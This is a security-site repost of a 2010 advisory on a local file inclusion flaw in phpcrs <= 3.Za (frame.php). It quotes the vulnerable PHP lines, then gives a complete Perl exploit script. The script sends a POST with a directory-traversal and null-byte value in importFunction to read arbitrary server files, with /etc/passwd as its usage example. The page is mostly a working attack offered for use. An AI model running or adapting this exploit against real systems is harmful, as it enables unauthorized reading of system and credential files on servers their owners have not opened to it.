首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 phpcrs <= 3.Za / Local File Inclusion Vulnerability 来源：pepelux[at]enye-sec.org 作者：Pepelux 发布时间：2010-09-07   # Author: Pepelux <pepelux[at]enye-sec.org> # Software Link: http://sourceforge.net/projects/phpcrs/ # Version: <= 3-Za - Release Date: 2010-01-02 # Category:: webapps # Google dork: # Tested on: windows & linux Debian #! /usr/bin/perl # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # phpcrs <= 3.Za / Local File Inclusion Vulnerability # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # # $ Program: phpcrs # $ Version: <= 3-Za # $ Release Date: 2010-01-02 # $ File affected: frame.php # $ Download: http://sourceforge.net/projects/phpcrs/ # # # Found by Pepelux <pepelux[at]enye-sec.org> # eNYe-Sec - www.enye-sec.org # # # --Bug -- # # 123.     elseif( isset($_POST['btnStartImport']) ) { # 124.       require("../inc/selectSupplierImport.inc.php"); # 125.       $importFunction = $_POST['importFunction']; # 126.       require("../inc/". $importFunction .".inc.php"); # 127.       $importFunction(); # # # In previous version you can exploit LFI by GET. On this version it checks that you use POST request, but # with a little script is possible to exploit again. use LWP::UserAgent; use HTTP::Request::Common; my ($host, $file) = @ARGV ; unless($ARGV[1]){     print "\nUsage: perl $0 <host> <file_to_edit>\n";     print "\tex: perl $0 http://localhost /etc/passwd\n\n";     exit 1; } $host = 'http://'.$host if ($host !~ /^http:/); $host .= "/" if ($host !~ /\/\$/); my $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); $ua->timeout(10); my $request = HTTP::Request->new(); my $response; my $url = $host."index.php"; my $req = HTTP::Request->new(POST => $host."frame.php"); $req->content_type('application/x-www-form-urlencoded'); $req->content("command=btnStartImport=xxx&importFunction=../../../../../".$file."%00"); $request = $ua->request($req); $result = $request->content; $result =~ s/<[^>]*>//g; print $result . "\n"; exit;   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·IZArc DLL Hijacking (ztv7z.dll ·win32/vista sp1 ING. (cmd.exe) ·HP OpenView NNM webappmon.exe ·Novell Netware NWFTPD RMD/RNFR ·Gantry Framework 3.0.10 (Jooml ·Java Bridge v. 5.5 Directory T ·myBB 1.0.6 Denial of Service E ·ColdCalendar 2.06 SQL Injectio ·ColdUserGroup 1.06 Blind SQL I ·QQPlayer 2.3.696.400p1(.wav) D ·Internet Download Accelerator ·phpBB 3.0.7-PL1 - Denial Of Se   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved